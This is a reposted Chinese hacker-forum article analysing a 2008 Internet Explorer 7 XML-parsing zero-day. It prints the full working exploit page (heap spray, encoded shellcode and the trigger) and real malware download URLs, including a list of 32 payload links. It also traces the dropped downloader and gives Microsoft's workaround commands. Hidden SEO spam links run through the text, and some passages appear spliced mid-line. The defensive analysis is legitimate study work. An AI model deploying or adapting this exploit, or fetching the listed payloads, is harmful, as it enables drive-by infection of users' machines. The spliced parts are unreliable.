【3.A.S.T】网络安全爱好者's Archiver

黑客学习

期待~~ 发表于 2009-11-5 07:25

【转载】攻防实战:深入剖析最新IE7.0 0day漏洞利用代码(图)

攻防实战:深入剖析最新IE7.0 0day漏洞利用代码(图)





         这几天国内几乎所有的媒体都用大幅的版面报道了IE7.0的最新漏洞,由于微软迟迟没有推出安全补丁,并且该漏洞能影响到所有使用IE控件的程序,包括各主要浏览器、邮件客户端、办公软件、Rss订阅器以及可嵌入网页的所有第三方软件,影响范围极其广泛!笔者做了一个试验,在Google浏览器中中搜索一下“ie7.0 0day”出来2700多条记录,各大杀毒厂商纷纷推出漏洞修复工具以及预防方法,感觉比MS08067漏洞还热闹,算是岁末安全界的一件大事。 12月9 日,国内一些安全界知名人士的blog纷纷贴出了漏洞代码,不少无赖网站都纷纷挂上了恶意代码已获取利益。笔者的几个朋友未能幸免,点击恶意网站后导致机器蓝屏无法加载系统,只得郁闷的重装。为了了解恶意代码的危害,提高大家的安全意识,笔者在这里对该恶意代码进行一个简单的分析,希望能对大家有所帮助,避免不必要的损失。[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
获取IE7.0 最新漏洞代码
1.获取IE7.0 0day代码
获取代码的一个最好的方式就是通过Google等搜索工具搜索,推荐在本地在虚拟机中使用VPN代理到Google英文版中搜索,相对而言国外会早于国内公布0day代码。关于该漏洞代码,现在很多安全和黑客网站都已经贴出了代码,如果没有该代码的可以到[url=http://www.antian365.com/bbs/viewthread.php?tid=2813&]http://www.antian365.com/bbs/viewthread.php?tid=2813&;extra=page%3D1(呵呵,顺便帮团队做下广告)将以下代码保存为将该代码保存为IE7_0day.htm,即IE7.0 0Day。[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
<script language="javascript">
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");[size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]
function sleep(milliseconds)
{
var start=new Date().getTime();
for(var i=0;i<1e7;i++)
{if((new Date().getTime()-start)>milliseconds)
{break}
}
}
function spray(sc)
{
var infect=unescape(sc.replace(/dadong/g,"\x25\x75"));
var heapBlockSize=0x100000;
var payLoadSize=infect.length*2;
var szlong=heapBlockSize-(payLoadSize+0x038);
var retVal=unescape("%u0a0a%u0a0a");
retVal=getSampleValue(retVal,szlong);
aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
zzchuck=new Array();
for(i=0;i<aaablk;i++){zzchuck=retVal+infect}
}
function getSampleValue(retVal,szlong)
{
while(retVal.length*2<szlong)
{retVal+=retVal}
retVal=retVal.substring(0,szlong/2);
return retVal
}
var a1="dadong";
spray(a1+"9090"+a1+"dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031C[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122dadong4921dadong0121
dadong2121dadong214BdadongF1DEdadong2198dadong2131dadongAA21dadongCAD9dadong7F24dadong85D2dadongF1DEdadongD7C9[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadongDEDEdadongC9DEdadong221Cdadong2121dadongD9AAdadong19C9dadong2121dadongC921dadong206Cdadong2121dadong67C9[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong2121dadongC921dadong22FAdadong2121dadongD9AAdadong03C9dadong2121dadongC921dadong2065dadong2121dadong11C9[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong2121dadongC921dadong22A8dadong2121dadongD9AAdadong2DC9dadong2121dadongC921dadong2040dadong2121dadong3BC9[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong2121dadongCA21dadong7279dadongFDAAdadong4B72dadong4961dadong3121dadong2121dadongC976dadong2390dadong2121
dadongC4C9dadong2121dadong7921dadong72E2dadongFDAAdadong4B72dadong4901dadong3121dadong2121dadongC976dadong23B8[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong2121dadongECC9dadong2121dadong7921dadong76E2dadong1DC9dadong2125dadongAA21dadong12D9dadong68E8dadongE112[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadongE291dadongD3DDdadongAC8FdadongDE66dadongE27Edadong1F7Adadong26E7dadong1F99dadong7EA8dadong4720dadongE61F[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadong2466dadongC1DEdadongC8E2dadong25B4dadong2121dadongA07Adadong35CDdadong2120dadongAA21dadong1FF5dadong23E6[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadong4C42dadong0145dadongE61Fdadong2563dadong420Edadong0301dadongE3A2dadong1229dadong71E1dadong4971dadong2025[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadong2121dadong7273dadongC971dadong22E0dadong2121dadongF1DEdadongDDAAdadongE6AAdadongE1A2dadong1F29dadong39AB[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadongFAA5dadong2255dadongCA61dadong1FD7dadong21E7dadong1203dadong1FF3dadong71A9dadongA220dadong75CDdadongE112[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]

dadongE2A2dadong1231dadong1FE1dadong62E6dadong200Ddadong2121dadong7021dadong7172dadong7171dadong7171dadong7671[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadongC971dadong2218dadong2121dadong38C9dadong2121dadong4521dadong2580dadong2121dadongAC21dadong4181dadongDEDE[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadongC9DEdadong2216dadong2121dadongFA12dadong7272dadong7272dadongF1DEdadong19A1dadongA1C9dadongC819dadong2E54
dadong59A0dadongB124dadongB1B1dadong55B1dadong7427dadongCDAAdadong61ACdadongDE24dadongC9C1dadongDE0FdadongDEDE[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadongC9E2dadongDE09dadongDEDEdadong3099dadong2520dadongE3A1dadong212Ddadong3AC9dadongDEDEdadong12DEdadong71E1[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadongC975dadong2175dadong2121dadongC971dadong23AAdadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92B[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadong2360dadong2121dadongDE12dadongDE76dadongC9F1dadong20DAdadong2121dadongDE49dadong2121dadongDE21dadongC9F1[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadongDFC9dadongDEDEdadong7672dadong1277dadong71E1dadongC975dadong213Fdadong2121dadongC971dadong2374dadong2121[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong232Adadong2121dadongDE12dadongDE76dadong79F1dadong7E7F[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadongE27Adadong23CAdadongE279dadongD8C9dadongDEDEdadong77DEdadongA276dadong29CDdadongDDAAdadong294Bdadong1F76[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadong56DEdadongC935dadong237Cdadong2121dadongF1DEdadongDDAAdadong4049dadong444Cdadong4921dadong6468dadong5367[size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]
dadongD5AAdadong2998dadong2121dadongD221dadong5487dadong4B0Edadong1F21dadong55DEdadong0105dadong05C9dadong2123[size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]
dadongDE21dadongAAF1dadongC9D9dadong20EAdadong2121dadongF1DEdadongD91Adadong2955dadongAA17dadong0565dadong1F01[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadong21DEdadongDE1Fdadong0555dadongC93Ddadong20CEdadong2121dadongF1DEdadongE5A2dadong7E31dadong997Fdadong2120
dadong2121dadong49E2dadong4F4Edadong2121dadong5449dadong4D53dadongCA4CdadongAC34dadong0565dadong7125dadong03C9[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadongDEDFdadong71DEdadong6BC9dadong2123dadongC821dadongDFC3dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong29E5[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong4BE2dadong494Ddadong554Fdadong4D45dadong34CAdadong65ACdadong2505dadongC971dadongDCDAdadongDEDEdadongC971[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong2302dadong2121dadong9AC8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong1249dadong2113[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong4921dadong5254dadong5344dadong34CAdadong65ACdadong2505dadongC971dadongDCF0dadongDEDEdadongC971dadong20D8
dadong2121dadongB0C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong4249dadong5657dadong4921[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadong4952dadong4E45dadong34CAdadong65ACdadong2505dadongC971dadongDC86dadongDEDEdadongC971dadong20EEdadong2121[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong46C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong5749dadong5946dadongCA21dadongAC34[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong0565dadong7125dadongA3C9dadongDEDCdadong71DEdadong8BC9dadong2120dadongC821dadongDF63dadongDEDEdadongC7C9[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadongDEDEdadongA2DEdadong25E5dadongC9E2dadong208Adadong2121dadong3A49dadong67E7dadong7158dadongE7C9dadong2120[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadongA221dadong29E5dadongC9E2dadong20B6dadong2121dadongCD49dadong22B6dadong712Ddadong93C9dadong2120dadongA221[size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]
dadong29E5dadongC9E2dadong20A2dadong2121dadong8B49dadong2CDDdadong715DdadongBFC9dadong2120dadongA221dadong29E5[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadongC9E2dadong204Edadong2121dadongCC49dadongCE77dadong7117dadongABC9dadong2120dadongA221dadong29E5dadongC9E2
dadong207Adadong2121dadongD149dadong25ABdadong717Edadong57C9dadong2120dadongA221dadong29E5dadongC9E2dadongDFD6[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadongDEDEdadong5949dadongFA49dadong713Ddadong43C9dadong2120dadongA221dadong29E5dadongC9E2dadong2012dadong2121[size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]
dadongCE49dadongC1EFdadong7141dadong6FC9dadong2120dadongA221dadong29E5dadongC9E2dadong203Edadong2121dadong9149[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong0C68dadong71FAdadong1BC9dadong2120dadongA221dadong29E5dadongC9E2dadongDE17dadongDEDEdadong8A49dadongBA7F[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadong713Fdadong07C9dadong2120dadongA221dadong29E5dadongC9E2dadongDF86dadongDEDEdadong7849dadongA0B6dadong7123[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong33C9dadong2120dadongA221dadong29E5dadongC9E2dadong21C2dadong2121dadong5F49dadongC3F9dadong7152dadongDFC9[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong2121dadongA221dadong29E5dadongC9E2dadong21EEdadong2121dadongBF49dadong9AD8dadong7114dadongCBC9dadong2121[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadongA221dadong29E5dadongC9E2dadongDFB3dadongDEDEdadong7649dadong9481dadong719AdadongF7C9dadong2121dadongA221[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong29E5dadongC9E2dadongDF5FdadongDEDEdadong3B49dadong3F5Bdadong7123dadongE3C9dadong2121dadongA221dadong29E5[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadongC9E2dadongDF4BdadongDEDEdadongC149dadong117Adadong71B5dadong8FC9dadong2121dadongA221dadong29E5dadongC9E2[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadongDF77dadongDEDEdadongB649dadongC3E8dadong7182dadongBBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF63[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadongDEDEdadong4949dadongE405dadong7192dadongA7C9dadong2121dadongA221dadong29E5dadongC9E2dadong2176dadong2121[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong5349dadong92DFdadong7137dadong53C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF65dadongDEDEdadong32CA[size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]
dadong444BdadongC971dadongDAD6dadongDEDEdadongC971dadongDF8AdadongDEDEdadong96C8dadongDEDDdadongC9DE
dadongDEC9dadongDEDEdadongC9E2dadongDC88dadongDEDEdadong6E49dadong6ECEdadong7124dadong1FC9dadong2121[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadongA221dadong29E5dadongC9E2dadong212Edadong2121dadongAF49dadong2F6Fdadong71CDdadong0BC9dadong2121dadongA221[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadong29E5dadong12E2dadong45E1dadong61AAdadongA411dadong59E1dadong1F31dadong61AAdadong1F2Ddadong51AAdadong8C3D[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadongAA1Fdadong2961dadongCAE2dadong1F2Adadong61AAdadongA215dadong5DE1dadongAA1Fdadong1D61dadong41E2dadongAA17
dadong054Ddadong1705dadong64AAdadong171Ddadong75AAdadong5924dadongF422dadongAA1Fdadong396BdadongAA1Fdadong017B[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadongFC22dadong1AC2dadong1F68dadong15AAdadong22AAdadong12D4dadong12DEdadongDDE1dadongA58Ddadong55E1dadongE026[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadong2CEEdadongD922dadongD5CAdadong1A17dadong055Ddadong5409dadong1FFEdadong7BAAdadong2205dadong47FCdadongAA1F[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong6A2DdadongAA1Fdadong3D7BdadongFC22dadongAA1FdadongAA25dadongE422dadongA817dadong0565dadong403DdadongC9E2[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadongDA47dadongDEDEdadong5549dadong5155dadong0E1Bdadong560Edadong5656dadong430Fdadong4840dadong444Adadong0F42[size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]
dadong4F42dadong450Edadong564Edadong0E4Fdadong4E4Adadong440Fdadong4459dadong2121dadong2121dadong2121dadong2121dadong2121[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121[size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong0021");[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
sleep(3000);
nav=navigator.userAgent.toLowerCase();
if(navigator.appVersion.indexOf('MSIE')!=-1)
{
version=parseFloat(navigator.appVersion.split('MSIE')[1])[size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]
}
if(version==7)
{
w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://r?r.book.com src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
var i=1;while(i<=10)
{
window.status=" ";i++}
}
</script>



2.对代码初步分析

对整个代码进行初步的分析,代码关键部分进行了加密,漏洞利用的原理应该是XML解析部分。在上面的代码中包含有“CDATA”,该标记明显为XML语言所特有。XML CDATA
的作用就是在CDATA部件之内的文本会被解析器忽略。估计是IE7.0 XML解析出现问题,从而导致挂马等漏洞利用。下面对该漏洞进行详细的分析。[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]

二、执行与测试该漏洞
1.搭建测试环境
(1)安装虚拟机和操作系统
对于0Day漏洞的测试一般都是在虚拟机中测试,一些包含0Day漏洞的代码往往会下载病毒到本地,由于无法预估这些病毒是良性还是恶性,因此建议在虚拟机中进行测试。在系统中安装好VMware虚拟机软件,然后安装Windows XP操作系统,关于安装虚拟机和操作系统网上有很多教程和资料,笔者就不赘述了。[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
(2)配置测试环境
在虚拟机打开安装好的Windows XP操作系统,下载并安装IE7.0的升级包IE7-WindowsXP-x86-cht.exe,然后将刚才生成的IE7_0day.htm文件拖入虚拟机中的Windows XP操作系统的桌面中,如图1所示。[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
[img]http://www.anqn.com/pic/10/a2008-12-23-734572.jpg[/img][url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
图1 配置测试环境

2.运行IE7_0day.htm文件
在桌面上双击“IE7_0day.htm”文件,IE浏览器会提示:“为了协助保护您的资讯安全性,Internet Explorer已限制这个网页执行指令档或可以存储您电脑的ActiveX控制项,其他选项请按这里.......”说实话,现在这样类似的提示实在是太多,很多Flash栏被拦截的时候都会提示相同的内容,如图2所示。
[img]http://www.anqn.com/pic/10/a2008-12-23-580193.jpg[/img][url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
图2 运行IE7_0day.htm后出现安全警告提示

说明:
如果是普通用户,可以不单击上面的提示,从而避免下载病毒到本地。
点击该标签栏,然后点击“允许被封锁的内容”,下载文件,如图3所示。
[img]http://www.anqn.com/pic/10/a2008-12-23-621580.jpg[/img][url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
图3 允许被封锁的内容

允许被封锁的内容后,IE会再弹出一个安全性警告,点击“是”后,代码就开始执行了,如图4所示。
[img]http://www.anqn.com/pic/10/a2008-12-23-360146.jpg[/img][url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
图4 执行代码



3 监控文件运行情况
(1)监控IE7_0day.htm运行后文件运行情况
我们使用文件监控工具看看该网页做了那些事情。双击“FileMon.exe”我们可以看到漏洞溢出后,在C:\Documents and Settings\hurricane\Local Settings\Temporary Internet Files\以及C:\Documents and Settings\hurricane\Local Settings\Temporary Internet Files\Content.IE5\6XUB49Q3\生成了ko.exe和ko[1].exe文件,如图5所示。其文件下载路径均为:[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
[url=http://www.baikec.cn/down/ko.exe]http://www.baikec.cn/down/ko.exe(注意不要下载该文件运行,呵呵,病毒文件),这应该就是网页制作者挂马的地方了。[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
[img]http://www.anqn.com/pic/10/a2008-12-23-371354.jpg[/img][url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
图 5 IE7_0day.htm下载木马文件到本地
(2)木马调用文件分析
从filemon的监控过程来看,应该是调用了cmd.exe来执行ko.exe,如图6所示,ko.exe文件打开了cmd.exe来创建、查询和关闭一些文件。[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
[img]http://www.anqn.com/pic/10/a2008-12-23-797613.jpg[/img][url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
图6 ko.exe调用cmd命令

(3)ko[1].exe下载文件分析

通过文件监视器,如图7所示,Ko[1].exe在临时文件夹中78767551中生成了一些新文件,通过分析发现该程序从网站[url=http://www.fengtianc.cn/]http://www.fengtianc.cn/下再ko.txt文本文件,读取ko.txt文本中的内容后,下载文本中指定的文件并执行。[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
[img]http://www.anqn.com/pic/10/a2008-12-23-112536.jpg[/img][url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
图7 ko[1].exe下载文件分析
到临时文件夹中找到ko.txt并打开该文件,从中可以发现34个可执行文件,其文件内容如下:
[file]
open=y
url1=http://222.gxfcd.cn/new/new1.exe
url2=http://222.gxfcd.cn/new/new2.exe
url3=http://222.gxfcd.cn/new/new3.exe
url4=http://222.gxfcd.cn/new/new4.exe
url5=http://222.gxfcd.cn/new/new5.exe
url6=http://222.gxfcd.cn/new/new6.exe
url7=http://222.gxfcd.cn/new/new7.exe
url8=http://222.gxfcd.cn/new/new8.exe
url9=http://222.gxfcd.cn/new/new9.exe
url10=http://222.gxfcd.cn/new/new10.exe
url11=http://222.gxfcd.cn/new/new11.exe
url12=http://222.gxfcd.cn/new/new12.exe
url13=http://222.gxfcd.cn/new/new13.exe
url14=http://222.gxfcd.cn/new/new14.exe
url15=http://222.gxfcd.cn/new/new15.exe
url16=http://333.gxfcd.cn/new/new16.exe
url17=http://333.gxfcd.cn/new/new17.exe
url18=http://333.gxfcd.cn/new/new18.exe
url19=http://333.gxfcd.cn/new/new19.exe
url20=http://333.gxfcd.cn/new/new20.exe
url21=http://333.gxfcd.cn/new/new21.exe
url22=http://333.gxfcd.cn/new/new22.exe
url23=http://333.gxfcd.cn/new/new23.exe
url24=http://333.gxfcd.cn/new/new24.exe
url25=http://333.gxfcd.cn/new/new25.exe
url26=http://333.gxfcd.cn/new/new26.exe
url27=http://333.gxfcd.cn/new/new27.exe
url28=http://333.gxfcd.cn/new/new28.exe
url29=http://333.gxfcd.cn/new/new29.exe
url30=http://333.gxfcd.cn/new/new30.exe
url31=http://444.gxfcd.cn/new/new31.exe
url32=http://444.gxfcd.cn/new/new32.exe
[img]http://www.anqn.com/pic/10/a2008-12-23-833272.jpg[/img][url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
图9 修改host文件

呵呵,说实话,我一开始也没弄明白,这个代码要屏蔽这些网站的目的是什么,后面听一个朋友的话才知道,其中的一些网站是我们国内的一些黑客组织网站;)这难道就是所谓的恶意竞争?[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
说明:
Hosts文件是一个用于存储计算机网络中节点信息的文件,它可以将主机名映射到相应的IP地址,实现DNS的功能,它可以由计算机的用户进行控制。Windows NT/2000/XP/2003/Vista默认位置%SystemRoot%\system32\drivers\etc\,但也可以改变。[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
通过执行该IE7.0 0Day可以知道黑客或者入侵者利用该工具在系统中所进行的操作。
分析和研究该代码
1.分析漏洞代码
代码应该说还是比较简单的,关键的Shellcode应该就是这一大段乱码了
spray
(a1+"9090"+a1+"dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031C[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
dadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dad可以将这个地址进行修改变换,笔者将该地址换成了本机的一个测试地址后,同样溢出成功,如图11所示。
[img]http://www.anqn.com/pic/10/a2008-12-23-140434.jpg[/img][url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
图11 更改下载地址后同样溢出成功

2 .分析可疑文件
我们看看ko.exe到底做了什么事情,先查下壳,用UPX加的壳,如图11所示。
[img]http://www.anqn.com/pic/10/a2008-12-23-472144.jpg[/img][url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
图12查看ko.exe文件壳

使用upx脱掉该壳,简要分析该执行程序,ko.exe执行后释放一个jiocs.dll到windows目录,通过Rundll32.exe将该dll文件注册起来。至于jiocs.dll简单看了下,是一个download下载者,这也和前面监控的现象相符合。[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
3.分析漏洞触发原理
不怎么会javascript,所以也没有具体分析,看了[url=http://hi.baidu.com/vessial]http://hi.baidu.com/vessial的介绍,大体知道是怎么触发这个漏洞的了?0day代码片断:[size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]

if(wxp||w2k3)document.write('<XMLID=I><X><C><![CDATA[<image SRC=http://r?r.book.com [url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C [size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]
DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
关键触发是由于这个Image SRC的字段的数据造成的http://r?r.book.com
mshtml.dll会对这个SRC作解析,刚好该地址它们拼在一起就是一个可利用的堆地址,可使shellcode填充到这个地址空间去,从而执行我们的代码。[size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]

四、漏洞补丁及安全防范
关于该漏洞的补丁microsoft直到12月15号相关的补丁也没有出来,国内的一些安全组织倒是提前给出了安全补丁,呵呵,值得表扬![url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
给出国内的一些补丁下载地址:
360安全卫士   [url=http://dl.360safe.com/360fixmsxml.exe]http://dl.360safe.com/360fixmsxml.exe[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
江民  [url=http://filedown.jiangmin.com/KVIEXMLPatch.exe]http://filedown.jiangmin.com/KVIEXMLPatch.exe[size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]
IE 最新 0day 波及了微软全线系统,目前暂时没有补丁。微软于近日发布了一份安全通报,指导您如何暂时屏蔽此漏洞。[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
漏洞出在 OLEDB32.dll 这个文件上。所以我们的目的就是屏蔽这个文件。对此,微软连出了4个杀手锏:
1. SACL 法(仅适用于 Vista)
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[File Security]
"%ProgramFiles%\CommonFiles\System\Ole DB\oledb32.dll",2,"S:(ML;;NWNRNX;;;ME)"[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
将以上内容保存为 BlockAccess_x86.inf
然后在命令提示符里执行 SecEdit /configure /db BlockAccess.sdb /cfg <inf file>[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
其中 <inf file> 为 inf 文件路径。若成功会看到“任务成功结束”的提示。
2. 禁用 Row Position 功能法
HKEY_CLASSES_ROOT\CLSID\{2048EEE6-7FA2-11D0-9E6A-00A0C9138C29}[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
打开注册表编辑器,将此键删除即可。
3. 取消 DLL 注册法
在命令提示符中输入 Regsvr32.exe /u "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll"即可[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
4. 权限设置法
在命令提示符中输入 cacls "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll" /E /P everyone:N[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
Vista 系统则需要输入3个命令:
takeown /f "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll"[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
icacls "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll" /save %TEMP%\oledb32.32.dll.TXT[size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]
icacls "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll" /deny everyone:(F)
其中第一种方法影响最小(只影响 IE 对此 DLL 的访问)。
五.经验及感受
